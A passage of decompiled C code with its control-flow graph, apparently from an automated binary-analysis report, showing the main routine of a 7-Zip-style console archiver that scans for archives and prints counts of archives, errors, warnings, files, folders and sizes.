                                                                                                    control_flow_graph 478 3e8754-3e8767 call 3ea3cd 481 3e877a-3e8795 call 3c0b45 478->481 482 3e8769-3e8775 call 3b1fb3 478->482 486 3e87a6-3e87af 481->486 487 3e8797-3e87a1 481->487 482->481 488 3e87bf 486->488 489 3e87b1-3e87bd 486->489 487->486 490 3e87c2-3e87cc 488->490 489->488 489->490 491 3e87ce-3e87e3 GetStdHandle GetConsoleScreenBufferInfo 490->491 492 3e87ec-3e881b call 3b1e0c call 3e9acd 490->492 491->492 493 3e87e5-3e87e9 491->493 500 3e881d-3e881f 492->500 501 3e8823-3e8849 call 3d67b1 call 3ea789 call 3d5c4b 492->501 493->492 500->501 507 3e884e-3e885f call 3c06b6 501->507 510 3e8893-3e88bf call 3dcb7d 507->510 511 3e8861-3e8863 507->511 518 3e88d7-3e88f5 510->518 519 3e88c1-3e88d2 _CxxThrowException 510->519 513 3e887d-3e888e _CxxThrowException 511->513 514 3e8865-3e886c 511->514 513->510 514->513 516 3e886e-3e887b call 3c06da 514->516 516->510 516->513 521 3e88f7-3e891b call 3d6a40 518->521 522 3e8951-3e896c 518->522 519->518 529 3e8a11-3e8a22 _CxxThrowException 521->529 530 3e8921-3e8925 521->530 525 3e896e 522->525 526 3e8973-3e89bb call 3b1fa0 fputs call 3b1fa0 strlen * 2 522->526 525->526 540 3e8c3c-3e8c64 call 3b1fa0 fputs call 3b1fa0 526->540 541 3e89c1-3e89fb fputs fputc 526->541 533 3e8a27 529->533 530->529 532 3e892b-3e894f call 3eae93 call 3b1e40 530->532 532->521 532->522 536 3e8a29-3e8a3c 533->536 544 3e8a3e-3e8a4a 536->544 545 3e89fd-3e8a07 536->545 554 3e8c6a 540->554 555 3e8d23-3e8d4b call 3b1fa0 fputs call 3b1fa0 540->555 541->544 541->545 551 3e8a4c-3e8a54 544->551 552 3e8a98-3e8ac8 call 3ea499 call 3b2d47 544->552 545->533 547 3e8a09-3e8a0f 545->547 547->536 556 3e8a56-3e8a61 551->556 557 3e8a82-3e8a97 call 3b21d8 551->557 593 3e8aca-3e8ace 552->593 594 3e8b27-3e8b3f call 3ea499 552->594 558 3e8c71-3e8c86 call 3ea46c 554->558 579 3e9a3a-3e9a41 555->579 580 3e8d51 555->580 560 3e8a6b 556->560 561 3e8a63-3e8a69 556->561 557->552 572 3e8c88-3e8c90 558->572 573 3e8c92-3e8c95 call 3b21d8 558->573 566 3e8a6d-3e8a80 560->566 561->566 566->556 566->557 583 3e8c9a-3e8d1d call 3eac00 fputs call 3b1fa0 572->583 573->583 584 3e9a43-3e9a4a 579->584 585 3e9a51-3e9a7d call 3ea789 call 3b1e40 call 3d1eab 579->585 586 3e8d58-3e8db4 call 3ea46c call 3ea405 call 3eac00 fputs call 3b1fa0 580->586 583->555 583->558 584->585 589 3e9a4c call 3ea7a4 584->589 618 3e9a7f-3e9a81 585->618 619 3e9a85-3e9acc call 3b1e40 call 3b11c2 call 3eac28 call 3d0a72 585->619 661 3e8db6 586->661 589->585 600 3e8ad8-3e8af4 call 3b3128 593->600 601 3e8ad0-3e8ad3 call 3b30a1 593->601 620 3e8b62-3e8b6a 594->620 621 3e8b41-3e8b61 fputs call 3b21d8 594->621 613 3e8b1c-3e8b25 600->613 614 3e8af6-3e8b17 call 3b3164 call 3b3128 call 3b1089 600->614 601->600 613->593 613->594 614->613 618->619 624 3e8c16-3e8c36 call 3b1fa0 call 3b1e40 620->624 625 3e8b70-3e8b74 620->625 621->620 624->540 624->541 631 3e8b76-3e8b84 fputs 625->631 632 3e8b85-3e8b99 625->632 631->632 638 3e8b9b-3e8b9f 632->638 639 3e8c07-3e8c10 632->639 644 3e8bac-3e8bb6 638->644 645 3e8ba1-3e8bab 638->645 639->624 639->625 651 3e8bbc-3e8bc8 644->651 652 3e8bb8-3e8bba 644->652 645->644 659 3e8bcf 651->659 660 3e8bca-3e8bcd 651->660 652->651 658 3e8bef-3e8c05 652->658 658->638 658->639 665 3e8bd2-3e8be5 659->665 660->665 661->579 670 3e8bec 665->670 671 3e8be7-3e8bea 665->671 670->658 671->658
                                                                                                    C-Code - Quality: 75%
                                                                                                    			E003E8754(char* __ebx, signed int __edi, signed int __esi) {
				intOrPtr _t590;
				signed int _t591;
				signed char _t597;
				struct _IO_FILE** _t601;
				void* _t603;
				char* _t604;
				intOrPtr* _t612;
				char* _t617;
				char* _t628;
				signed char _t637;
				signed int _t641;
				signed int _t649;
				char* _t661;
				void* _t677;
				void* _t682;
				signed int _t683;
				void* _t685;
				struct _IO_FILE** _t690;
				void* _t694;
				void* _t716;
				signed char _t743;
				signed char _t756;
				signed char _t771;
				struct _IO_FILE** _t786;
				signed char _t795;
				signed int _t797;
				struct _IO_FILE** _t798;
				char* _t818;
				signed char _t819;
				signed char _t829;
				char* _t831;
				struct _IO_FILE** _t833;
				int _t839;
				signed int _t858;
				signed int _t864;
				signed int _t870;
				void* _t899;
				struct _IO_FILE** _t903;
				signed char _t907;
				unsigned int _t908;
				unsigned int _t909;
				signed char _t910;
				signed int _t914;
				signed int _t936;
				signed char _t938;
				signed int _t942;
				signed char _t944;
				struct _IO_FILE** _t951;
				void* _t954;
				struct _IO_FILE** _t956;
				struct _IO_FILE** _t958;
				void* _t960;
				int _t966;
				void* _t972;
				struct _IO_FILE* _t973;
				signed int _t974;
				struct _IO_FILE** _t1144;
				signed char _t1157;
				signed char _t1234;
				signed char _t1237;
				signed int _t1246;
				void* _t1257;
				signed int _t1269;
				intOrPtr* _t1270;
				struct _IO_FILE** _t1273;
				signed int _t1274;
				signed int _t1276;
				signed int _t1277;
				signed char _t1280;
				struct _IO_FILE** _t1282;
				signed int _t1283;
				struct _IO_FILE** _t1284;
				signed int _t1285;
				void* _t1286;
				intOrPtr* _t1288;
				void* _t1310;
				unsigned int _t1319;
				void* _t1342;
				void* _t1344;

				_t1276 = __esi;
				_t1269 = __edi;
				_t970 = __ebx;
				_t974 =  *0x43a894; // 0x43a5b0
				E003EA3CD(_t974, 0);
				_t1291 =  *((intOrPtr*)(_t1286 - 0xd8)) - __ebx;
				if( *((intOrPtr*)(_t1286 - 0xd8)) != __ebx) {
					_push( *((intOrPtr*)(_t1286 - 0xdc)));
					_t1246 =  *0x43a894; // 0x43a5b0
					L003B1FB3(_t1246, _t1291);
				}
				E003C0B45(_t970, _t1286 - 0x108, _t1269, _t1276, _t1286 - 0x340); // executed
				_t590 =  *((intOrPtr*)(_t1286 - 0x318));
				if(_t590 != 0xffffffff) {
					 *0x43a5b8 = _t590;
					 *0x43a5a8 = _t590;
					 *0x43a59c = _t590;
				}
				 *(_t1286 - 0x1c) = _t1269;
				if( *((intOrPtr*)(_t1286 - 0x114)) == _t970 ||  *((intOrPtr*)(_t1286 - 0x118)) !=  *((intOrPtr*)(_t1286 - 0x120))) {
					 *(_t1286 - 0x1c) = _t1276;
				}
				 *(_t1286 - 0x14) = 0x50;
				if( *(_t1286 - 0x18) != _t970) {
					_t966 = GetConsoleScreenBufferInfo(GetStdHandle(0xfffffff5), _t1286 - 0x44); // executed
					if(_t966 != 0) {
						 *(_t1286 - 0x14) =  *(_t1286 - 0x44) & 0x0000ffff;
					}
				}
				_push(0x18);
				_t591 = E003B1E0C();
				 *(_t1286 - 0x58) = _t591;
				 *(_t1286 - 4) = 5;
				if(_t591 == _t970) {
					_t1270 = 0;
					__eflags = 0;
				} else {
					_t1270 = L003E9ACD(_t591);
				}
				_t1298 = _t1270 - _t970;
				 *((intOrPtr*)(_t1286 - 0x2c)) = _t1270;
				 *(_t1286 - 4) = 4;
				 *((intOrPtr*)(_t1286 - 0xd0)) = _t1270;
				if(_t1270 != _t970) {
					 *((intOrPtr*)( *_t1270 + 4))(_t1270);
				}
				 *((char*)(_t1270 + 0x14)) =  *((intOrPtr*)(_t1286 - 0x33f));
				 *(_t1286 - 4) = 6;
				 *((char*)(_t1270 + 0x15)) =  *((intOrPtr*)(_t1286 - 0x33e));
				E003EA789(E003D67B1(_t970, _t1270, _t1270, _t1298));
				E003D5C4B(_t1270, _t1298); // executed
				_t597 = E003C06B6(_t1286 - 0x2f8);
				 *(_t1286 - 0xd) = _t597;
				if( *((intOrPtr*)(_t1270 + 0xc)) != _t970) {
					L20:
					 *(_t1286 - 0xc0) = _t970;
					 *(_t1286 - 0xbc) = _t970;
					 *(_t1286 - 0xb8) = _t970;
					_t1248 = _t1286 - 0x138;
					_push(_t1286 - 0xc0);
					 *(_t1286 - 4) = 7;
					if(E003DCB7D(_t1270, _t1248, _t1302) == 0) {
						_t956 =  *0x42d3e4; // 0x42d3e8
						_push(0x430ad8);
						 *(_t1286 - 0x24) = _t956;
						_push(_t1286 - 0x24);
						L0041F1D0();
					}
					 *(_t1286 - 0xcc) = _t970;
					 *(_t1286 - 0xc8) = _t970;
					 *(_t1286 - 0xc4) = _t970;
					_t1277 = 0;
					 *(_t1286 - 4) = 8;
					if( *((intOrPtr*)(_t1286 - 0x128)) <= _t970) {
						L26:
						 *(_t1286 - 0x28) = _t970;
						 *(_t1286 - 0x20) = _t970;
						if( *((intOrPtr*)(_t1286 - 0x2f8)) != 8) {
							__eflags =  *((intOrPtr*)(_t1286 - 0x2f8)) - 7;
							if( *((intOrPtr*)(_t1286 - 0x2f8)) != 7) {
								__eflags =  *(_t1286 - 0xd);
								if( *(_t1286 - 0xd) != 0) {
									L113:
									 *((intOrPtr*)(_t1286 - 0x78)) = 0;
									 *((intOrPtr*)(_t1286 - 0x74)) = 0;
									 *((intOrPtr*)(_t1286 - 0x70)) = 0;
									 *(_t1286 - 0x38) = 0;
									 *(_t1286 - 0x34) = 0;
									 *(_t1286 - 0x30) = 0;
									__eflags =  *((char*)(_t1286 - 0x33a));
									_t970 = fputs;
									 *(_t1286 - 4) = 0xc;
									if(__eflags == 0) {
										_push(0xc8);
										E003E8134(_t1286 - 0x43c, __eflags);
										 *((intOrPtr*)(_t1286 - 0x44c)) = 0x42e058;
										_t601 =  *0x43a894;
										asm("sbb ecx, ecx");
										 *(_t1286 - 4) = 0xd;
										 *(_t1286 - 0x448) =  ~( *(_t1286 - 0x338)) & _t601;
										 *(_t1286 - 0x444) =  *0x43a898;
										 *(_t1286 - 0x398) =  *(_t1286 - 0x18);
										__eflags = _t601;
										 *((intOrPtr*)(_t1286 - 0x390)) =  *(_t1286 - 0x14) - 1;
										if(_t601 != 0) {
											__eflags =  *(_t1286 - 0x338);
											if( *(_t1286 - 0x338) != 0) {
												fputs("Scanning the drive for archives:",  *_t601); // executed
												E003B1FA0(_t601);
											}
										}
										_t339 = _t1286 - 0x44c; // 0x42e058
										 *((intOrPtr*)(_t1286 - 0xac)) = 0;
										 *((intOrPtr*)(_t1286 - 0xa8)) = 0;
										 *((intOrPtr*)(_t1286 - 0xa4)) = 0;
										 *((intOrPtr*)(_t1286 - 0xa0)) = 0;
										 *((intOrPtr*)(_t1286 - 0x9c)) = 0;
										 *((intOrPtr*)(_t1286 - 0x98)) = 0;
										 *(_t1286 - 0x94) = 0;
										 *(_t1286 - 0x90) = 0;
										 *((intOrPtr*)(_t1286 - 0x8c)) = 0;
										 *(_t1286 - 0x88) = 0;
										 *(_t1286 - 0x84) = 0;
										 *(_t1286 - 0x80) = 0;
										E003E421A(_t339);
										_t603 = E003B2D47(_t1286 - 0x60);
										_t353 = _t1286 - 0x44c; // 0x42e058
										_push(_t1286 - 0xac);
										_push(_t1286 - 0x38);
										_push(_t1286 - 0x78);
										_push(_t603);
										 *(_t1286 - 4) = 0xe;
										_t604 = E003D0461(_t970, _t1286 - 0x2cc, 0, 0, __eflags); // executed
										 *(_t1286 - 0x20) = _t604;
										 *(_t1286 - 4) = 0xd;
										E003B1E40(_t604,  *((intOrPtr*)(_t1286 - 0x60)));
										__eflags =  *(_t1286 - 0x398);
										if( *(_t1286 - 0x398) != 0) {
											E003EB5FA(_t1286 - 0x43c, 0, 1); // executed
										}
										__eflags =  *(_t1286 - 0x20);
										if( *(_t1286 - 0x20) == 0) {
											__eflags =  *(_t1286 - 0x338);
											if( *(_t1286 - 0x338) != 0) {
												_push(_t1286 - 0xac); // executed
												E003E45B8(_t1286 - 0x44c); // executed
											}
										}
										 *(_t1286 - 4) = 0xc;
										E003EB561(_t1286 - 0x43c);
										__eflags =  *(_t1286 - 0x20);
										if( *(_t1286 - 0x20) != 0) {
											L190:
											 *(_t1286 - 4) = 0xb;
											E003D0A72(_t970, _t1286 - 0x38);
											 *(_t1286 - 4) = 8;
											E003D0A72(_t970, _t1286 - 0x78);
											goto L191;
										} else {
											L124:
											__eflags =  *(_t1286 - 0xd);
											if(__eflags == 0) {
												_push(_t1286 - 0x5c);
												_push(_t1286 - 0x50);
												_push(_t1286 - 0x2a4);
												 *(_t1286 - 0x24) =  *((intOrPtr*)(_t1286 - 0x308));
												_push(_t1286 - 0x2e4);
												 *((char*)(_t1286 - 0x23)) =  *((intOrPtr*)(_t1286 - 0x307));
												_push(_t1286 - 0x2e8);
												 *(_t1286 - 0x50) = 0;
												_push( *((intOrPtr*)(_t1286 - 0x335)));
												 *(_t1286 - 0x4c) = 0;
												 *(_t1286 - 0x5c) = 0;
												 *(_t1286 - 0x58) = 0;
												_push( *(_t1286 - 0x338));
												_push( *((intOrPtr*)( *((intOrPtr*)(_t1286 - 0x314)))) + 0xc);
												_push( *((intOrPtr*)(_t1286 - 0x331)));
												_push( *((intOrPtr*)(_t1286 - 0x270)));
												_push(_t1286 - 0x38);
												_push(_t1286 - 0x78);
												_push( *((intOrPtr*)(_t1286 - 0x33a)));
												_push(_t1286 - 0xcc);
												_push(_t1286 - 0xc0);
												_t628 = L003E74FD(_t1286 - 0x24,  *((intOrPtr*)(_t1286 - 0x2c)), __eflags);
												__eflags =  *(_t1286 - 0x338);
												 *(_t1286 - 0x20) = _t628;
												if( *(_t1286 - 0x338) == 0) {
													L185:
													__eflags =  *(_t1286 - 0x4c);
													if( *(_t1286 - 0x4c) > 0) {
														L187:
														__eflags =  *(_t1286 - 0x338);
														if( *(_t1286 - 0x338) != 0) {
															E003B1FA0(0x43a5b0);
															 *_t970("Errors: ",  *0x43a5b0);
															E003B1FA0(E003B2201(0x43a5b0,  *(_t1286 - 0x50),  *(_t1286 - 0x4c)));
														}
														 *(_t1286 - 0x28) = 2;
														goto L190;
													}
													__eflags =  *(_t1286 - 0x50);
													if( *(_t1286 - 0x50) <= 0) {
														goto L190;
													}
													goto L187;
												}
												__eflags =  *(_t1286 - 0x58);
												if( *(_t1286 - 0x58) > 0) {
													L184:
													E003B1FA0(0x43a5b0);
													 *_t970("Warnings: ",  *0x43a5b0);
													E003B1FA0(E003B2201(0x43a5b0,  *(_t1286 - 0x5c),  *(_t1286 - 0x58)));
													goto L185;
												}
												__eflags =  *(_t1286 - 0x5c);
												if( *(_t1286 - 0x5c) <= 0) {
													goto L185;
												}
												goto L184;
											}
											_push(0x170);
											_t637 = E003B1E0C();
											 *(_t1286 - 0x58) = _t637;
											__eflags = _t637;
											 *(_t1286 - 4) = 0xf;
											if(__eflags == 0) {
												_t1280 = 0;
												__eflags = 0;
											} else {
												_t1280 = L003E9F16(_t637, __eflags);
											}
											__eflags = _t1280;
											 *(_t1286 - 4) = 0xc;
											 *(_t1286 - 0x58) = _t1280;
											if(_t1280 != 0) {
												 *((intOrPtr*)( *_t1280 + 4))(_t1280);
											}
											_t378 = _t1280 + 0xdc; // 0xdc
											 *((char*)(_t1280 + 0xda)) =  *((intOrPtr*)(_t1286 - 0x2e8));
											 *(_t1286 - 4) = 0x10;
											E003B2F2F(_t378, _t1286 - 0x2e4);
											_t641 = E003EA093(_t1280,  *0x43a894,  *0x43a898,  *(_t1286 - 0x18));
											__eflags =  *((intOrPtr*)(_t1286 - 0x74)) - 1;
											__eflags =  *(_t1286 - 0x18);
											 *((char*)(_t1280 + 0xd9)) = _t641 & 0xffffff00 |  *((intOrPtr*)(_t1286 - 0x74)) - 0x00000001 > 0x00000000;
											 *((intOrPtr*)(_t1280 + 0x168)) =  *((intOrPtr*)(_t1286 - 0x114));
											 *(_t1280 + 0x164) =  *(_t1286 - 0x1c);
											if(__eflags != 0) {
												_t756 =  *(_t1286 - 0x14) - 1;
												__eflags = _t756;
												 *(_t1280 + 0xc4) = _t756;
											}
											L003E9B1D(_t1286 - 0x38c, __eflags);
											_push(_t1286 - 0x298);
											 *(_t1286 - 4) = 0x11;
											E003EAD5A(_t1286 - 0x38c);
											__eflags =  *((intOrPtr*)(_t1286 - 0x2f8)) - 3;
											 *((char*)(_t1286 - 0x350)) =  *((intOrPtr*)(_t1286 - 0x33a));
											_t649 =  *((intOrPtr*)(_t1286 - 0x337));
											 *(_t1286 - 0x34e) = _t649;
											 *(_t1286 - 0x34f) = _t649;
											 *((char*)(_t1286 - 0x34d)) = _t649 & 0xffffff00 |  *((intOrPtr*)(_t1286 - 0x2f8)) == 0x00000003;
											E003C2625(_t1286 - 0x34c, _t1286 - 0x2a4);
											E003B2D47(_t1286 - 0x54);
											 *(_t1286 - 4) = 0x12;
											E003D2FC1(_t1286 - 0x3ec);
											__eflags =  *(_t1286 - 0x2d4);
											 *(_t1286 - 4) = 0x13;
											 *(_t1286 - 0x1c) = 0;
											if( *(_t1286 - 0x2d4) != 0) {
												 *(_t1286 - 0x1c) = _t1286 - 0x3ec;
												_push(_t1286 - 0x2d8);
												E003EA789(E003D23C0(_t1286 - 0x3ec));
											}
											_push(_t1286 - 0xb4);
											_push(_t1286 - 0x54);
											_push( *(_t1286 - 0x1c));
											_t423 = _t1280 + 4; // 0x4
											asm("sbb ecx, ecx");
											_push(_t1280);
											_push( ~_t1280 & _t423);
											asm("sbb edx, edx");
											_t424 = _t1280 + 0x10; // 0x10
											_push( ~_t1280 & _t424);
											_push(_t1286 - 0x38c);
											_push( *((intOrPtr*)( *((intOrPtr*)(_t1286 - 0x314)))) + 0xc);
											_push(_t1286 - 0x38);
											_push(_t1286 - 0x78);
											_push(_t1286 - 0xcc);
											_t661 = E003D0D11( *((intOrPtr*)(_t1286 - 0x2c)), _t1286 - 0xc0); // executed
											__eflags =  *(_t1280 + 0xbc);
											 *(_t1286 - 0x20) = _t661;
											if( *(_t1280 + 0xbc) != 0) {
												_t433 = _t1280 + 0x18; // 0x18
												E003EB5FA(_t433, 0, 1);
											}
											__eflags =  *(_t1286 - 0x50);
											if( *(_t1286 - 0x50) != 0) {
												_t743 =  *0x43a898; // 0x43a5a0
												__eflags = _t743;
												if(__eflags != 0) {
													 *(_t1286 - 0x14) = _t743;
													E003B1FA0(_t743);
													fputs("ERROR:",  *( *(_t1286 - 0x14)));
													E003B1FA0( *(_t1286 - 0x14));
													_push( *((intOrPtr*)(_t1286 - 0x54)));
													E003B1FA0(L003B1FB3( *(_t1286 - 0x14), __eflags));
												}
												__eflags =  *(_t1286 - 0x20);
												if( *(_t1286 - 0x20) == 0) {
													 *(_t1286 - 0x20) = 0x80004005;
												}
											}
											_t1273 =  *0x43a894; // 0x43a5b0
											 *(_t1286 - 0xd) =  *(_t1286 - 0xd) & 0x00000000;
											__eflags = _t1273;
											if(_t1273 == 0) {
												L145:
												__eflags =  *(_t1280 + 0x128) |  *(_t1280 + 0x12c);
												if(( *(_t1280 + 0x128) |  *(_t1280 + 0x12c)) != 0) {
													__eflags = _t1273;
													 *(_t1286 - 0xd) = 1;
													if(_t1273 != 0) {
														fputs("Can\'t open as archive: ",  *_t1273);
														E003B1FA0(E003B2201(_t1273,  *(_t1280 + 0x128),  *(_t1280 + 0x12c)));
													}
												}
												__eflags =  *(_t1280 + 0x130) |  *(_t1280 + 0x134);
												if(( *(_t1280 + 0x130) |  *(_t1280 + 0x134)) == 0) {
													L151:
													__eflags = _t1273;
													if(_t1273 != 0) {
														_t461 = _t1280 + 0x138; // 0x138
														_t716 = _t461;
														__eflags =  *(_t1280 + 0x138) |  *(_t716 + 4);
														if(( *(_t1280 + 0x138) |  *(_t716 + 4)) != 0) {
															fputs("Archives with Warnings: ",  *_t1273);
															_t463 = _t1280 + 0x138; // 0x138
															E003B1FA0(E003B2201(_t1273,  *_t463,  *((intOrPtr*)(_t463 + 4))));
														}
														__eflags =  *(_t1280 + 0x148) |  *(_t1280 + 0x14c);
														if(( *(_t1280 + 0x148) |  *(_t1280 + 0x14c)) != 0) {
															E003B1FA0(_t1273);
															__eflags =  *(_t1280 + 0x148) |  *(_t1280 + 0x14c);
															if(( *(_t1280 + 0x148) |  *(_t1280 + 0x14c)) != 0) {
																fputs("Warnings: ",  *_t1273);
																E003B1FA0(E003B2201(_t1273,  *(_t1280 + 0x148),  *(_t1280 + 0x14c)));
															}
														}
													}
													goto L157;
												} else {
													__eflags = _t1273;
													 *(_t1286 - 0xd) = 1;
													if(_t1273 == 0) {
														L157:
														__eflags =  *(_t1280 + 0x140) |  *(_t1280 + 0x144);
														if(( *(_t1280 + 0x140) |  *(_t1280 + 0x144)) == 0) {
															L161:
															__eflags =  *(_t1286 - 0xd);
															if( *(_t1286 - 0xd) == 0) {
																L163:
																__eflags = _t1273;
																if(_t1273 == 0) {
																	L179:
																	 *(_t1286 - 4) = 0x12;
																	E003B1E40(E003D302F(_t1286 - 0x3ec),  *((intOrPtr*)(_t1286 - 0x54)));
																	 *(_t1286 - 4) = 0x14;
																	E003EAF20(_t1286 - 0x34c);
																	 *(_t1286 - 4) = 0x10;
																	L003E9B99(_t1286 - 0x38c);
																	__eflags = _t1280;
																	 *(_t1286 - 4) = 0xc;
																	if(_t1280 != 0) {
																		 *((intOrPtr*)( *_t1280 + 8))(_t1280);
																	}
																	goto L190;
																}
																__eflags =  *(_t1280 + 0x130) |  *(_t1280 + 0x134);
																if(( *(_t1280 + 0x130) |  *(_t1280 + 0x134)) != 0) {
																	L177:
																	E003B1FA0(_t1273);
																	_t514 = _t1280 + 0x150; // 0x150
																	_t677 = _t514;
																	__eflags =  *(_t1280 + 0x150) |  *(_t677 + 4);
																	if(( *(_t1280 + 0x150) |  *(_t677 + 4)) != 0) {
																		fputs("Sub items Errors: ",  *_t1273);
																		_t516 = _t1280 + 0x150; // 0x150
																		E003B1FA0(E003B2201(_t1273,  *_t516,  *((intOrPtr*)(_t516 + 4))));
																	}
																	goto L179;
																}
																_t483 = _t1280 + 0x150; // 0x150
																_t682 = _t483;
																__eflags =  *(_t1280 + 0x150) |  *(_t682 + 4);
																if(( *(_t1280 + 0x150) |  *(_t682 + 4)) != 0) {
																	goto L177;
																}
																__eflags =  *(_t1286 - 0x20);
																if( *(_t1286 - 0x20) != 0) {
																	goto L179;
																}
																_t683 =  *(_t1286 - 0x94);
																__eflags = _t683 |  *(_t1286 - 0x90);
																if((_t683 |  *(_t1286 - 0x90)) != 0) {
																	fputs("Folders: ",  *_t1273);
																	E003B1FA0(E003B2201(_t1273,  *(_t1286 - 0x94),  *(_t1286 - 0x90)));
																	_t683 =  *(_t1286 - 0x94);
																}
																__eflags =  *((intOrPtr*)(_t1286 - 0x8c)) - 1;
																if( *((intOrPtr*)(_t1286 - 0x8c)) != 1) {
																	L173:
																	fputs("Files: ",  *_t1273); // executed
																	_t685 = E003B2201(_t1273,  *((intOrPtr*)(_t1286 - 0x8c)),  *(_t1286 - 0x88)); // executed
																	E003B1FA0(_t685);
																	__eflags =  *(_t1286 - 0x84) |  *(_t1286 - 0x80);
																	if(( *(_t1286 - 0x84) |  *(_t1286 - 0x80)) != 0) {
																		fputs("Alternate Streams: ",  *_t1273);
																		E003B1FA0(E003B2201(_t1273,  *(_t1286 - 0x84),  *(_t1286 - 0x80)));
																		fputs("Alternate Streams Size: ",  *_t1273);
																		E003B1FA0(E003B2201(_t1273,  *((intOrPtr*)(_t1286 - 0xa4)),  *((intOrPtr*)(_t1286 - 0xa0))));
																	}
																	goto L175;
																} else {
																	__eflags =  *(_t1286 - 0x88);
																	if( *(_t1286 - 0x88) != 0) {
																		goto L173;
																	}
																	__eflags = _t683 |  *(_t1286 - 0x90);
																	if((_t683 |  *(_t1286 - 0x90)) != 0) {
																		goto L173;
																	}
																	__eflags =  *(_t1286 - 0x84) |  *(_t1286 - 0x80);
																	if(( *(_t1286 - 0x84) |  *(_t1286 - 0x80)) == 0) {
																		L175:
																		fputs("Size:       ",  *_t1273); // executed
																		_t690 = E003B2201(_t1273,  *((intOrPtr*)(_t1286 - 0xac)),  *((intOrPtr*)(_t1286 - 0xa8))); // executed
																		 *(_t1286 - 0x24) = _t690;
																		E003B1FA0(_t690);
																		fputs("Compressed: ",  *( *(_t1286 - 0x24))); // executed
																		_t694 = E003B2201( *(_t1286 - 0x24),  *((intOrPtr*)(_t1286 - 0x9c)),  *((intOrPtr*)(_t1286 - 0x98))); // executed
																		E003B1FA0(_t694);
																		__eflags =  *(_t1286 - 0x1c);
																		if( *(_t1286 - 0x1c) != 0) {
																			E003B1FA0(_t1273);
																			L003E5F0E(_t1273, _t1286 - 0x3ec);
																		}
																		goto L179;
																	}
																	goto L173;
																}
															}
															L162:
															 *(_t1286 - 0x28) = 2;
															goto L163;
														}
														__eflags = _t1273;
														 *(_t1286 - 0xd) = 1;
														if(_t1273 == 0) {
															goto L162;
														}
														E003B1FA0(_t1273);
														__eflags =  *(_t1280 + 0x140) |  *(_t1280 + 0x144);
														if(( *(_t1280 + 0x140) |  *(_t1280 + 0x144)) == 0) {
															goto L162;
														}
														fputs("Open Errors: ",  *_t1273);
														E003B1FA0(E003B2201(_t1273,  *(_t1280 + 0x140),  *(_t1280 + 0x144)));
														goto L161;
													}
													fputs("Archives with Errors: ",  *_t1273);
													E003B1FA0(E003B2201(_t1273,  *(_t1280 + 0x130),  *(_t1280 + 0x134)));
													goto L151;
												}
											} else {
												E003B1FA0(_t1273);
												__eflags =  *(_t1280 + 0x114);
												if( *(_t1280 + 0x114) > 0) {
													L144:
													fputs("Archives: ",  *_t1273);
													_t446 = _t1280 + 0x110; // 0x110
													E003B1FA0(E003B2201(_t1273,  *_t446,  *((intOrPtr*)(_t446 + 4))));
													fputs("OK archives: ",  *_t1273);
													E003B1FA0(E003B2201(_t1273,  *((intOrPtr*)(_t1280 + 0x120)),  *((intOrPtr*)(_t1280 + 0x124))));
													goto L145;
												}
												__eflags =  *((intOrPtr*)(_t1280 + 0x110)) - 1;
												if( *((intOrPtr*)(_t1280 + 0x110)) <= 1) {
													goto L145;
												}
												goto L144;
											}
										}
									}
									E003EF23F(_t1286 - 0x78);
									_push(_t1286 - 0x2b0);
									E003B1524(_t1286 - 0x78);
									E003EF23F(_t1286 - 0x38);
									_push(_t1286 - 0x2b0);
									E003B1524(_t1286 - 0x38);
									goto L124;
								}
								__eflags =  *((intOrPtr*)(_t1286 - 0x2f8)) - 6;
								if( *((intOrPtr*)(_t1286 - 0x2f8)) == 6) {
									goto L113;
								}
								_t771 = E003C06DA(_t1286 - 0x2f8);
								__eflags = _t771;
								if(_t771 == 0) {
									__eflags =  *((intOrPtr*)(_t1286 - 0x2f8)) - 9;
									if(__eflags != 0) {
										_t1257 = 7;
										E003EA37B(_t1257);
									} else {
										E003EA312(_t1286 - 0x5ac, __eflags);
										__eflags =  *(_t1286 - 0x18) - _t970;
										 *(_t1286 - 4) = 0x19;
										if( *(_t1286 - 0x18) != _t970) {
											_t795 =  *(_t1286 - 0x14) - 1;
											__eflags = _t795;
											 *(_t1286 - 0x4f8) = _t795;
										}
										_t1282 =  *0x43a898; // 0x43a5a0
										_t1274 =  *0x43a894; // 0x43a5b0
										E003D6B24(_t1286 - 0x4c8);
										 *(_t1286 - 0x500) =  *(_t1286 - 0x18);
										 *((char*)(_t1286 - 0x473)) =  *(_t1286 - 0x338);
										 *(_t1286 - 0x4b8) = _t970;
										 *(_t1286 - 0x4f4) = _t1274;
										 *(_t1286 - 0x4f0) = _t1282;
										E003B276E(_t1286 - 0x470, _t1286 - 0x324);
										E003B2690(_t1286 - 0x38);
										_push(_t1286 - 0x5ac);
										_push(_t1286 - 0x38);
										 *(_t1286 - 4) = 0x1a;
										 *(_t1286 - 0x20) = E003D29D4(_t1286 - 0x314, _t1286 - 0x150, __eflags);
										L003E9BB0(_t1286 - 0x98, __eflags);
										 *(_t1286 - 4) = 0x1b;
										E003B276E(_t1286 - 0x94, _t1286 - 0x38);
										_t786 =  *0x43a894; // 0x43a5b0
										_t1144 = _t786;
										__eflags = _t1144 - _t970;
										if(_t1144 == _t970) {
											_t1144 =  *0x43a898; // 0x43a5a0
										}
										_push( *(_t1286 - 0x338));
										_push(_t1144);
										_push(_t786);
										_push(_t1286 - 0x98);
										asm("sbb edx, edx");
										 *(_t1286 - 0x28) = E003EA4C7( *(_t1286 - 0x20),  ~(_t1286 - 0x5ac) & _t1286 - 0x000005a4);
										 *(_t1286 - 4) = 0x1c;
										E003B1E40(E003B1E40(E003D0A72(_t970, _t1286 - 0x88),  *(_t1286 - 0x94)),  *(_t1286 - 0x38));
										 *(_t1286 - 4) = 8;
										E003EAE14(_t970, _t1286 - 0x5ac);
									}
									goto L191;
								}
								__eflags =  *((char*)(_t1286 - 0x257));
								if(__eflags != 0) {
									__eflags =  *((intOrPtr*)(_t1286 - 0x198)) - _t970;
									if(__eflags == 0) {
										E003B302D(_t1286 - 0x19c, "7zCon.sfx");
									}
								}
								E003E80D3(_t1286 - 0x464, __eflags);
								_t797 =  *0x43a894; // 0x43a5b0
								_t1283 =  *(_t1286 - 0x18);
								__eflags =  *((char*)(_t1286 - 0x2e8));
								 *(_t1286 - 0x3ac) = _t797;
								_t798 =  *0x43a898; // 0x43a5a0
								 *(_t1286 - 4) = 0x15;
								 *(_t1286 - 0x3a8) = _t798;
								 *(_t1286 - 0x3b8) = _t1283;
								if( *((char*)(_t1286 - 0x2e8)) == 0) {
									L94:
									_t219 = _t1286 - 0xd;
									 *_t219 =  *(_t1286 - 0xd) & 0x00000000;
									__eflags =  *_t219;
									goto L95;
								} else {
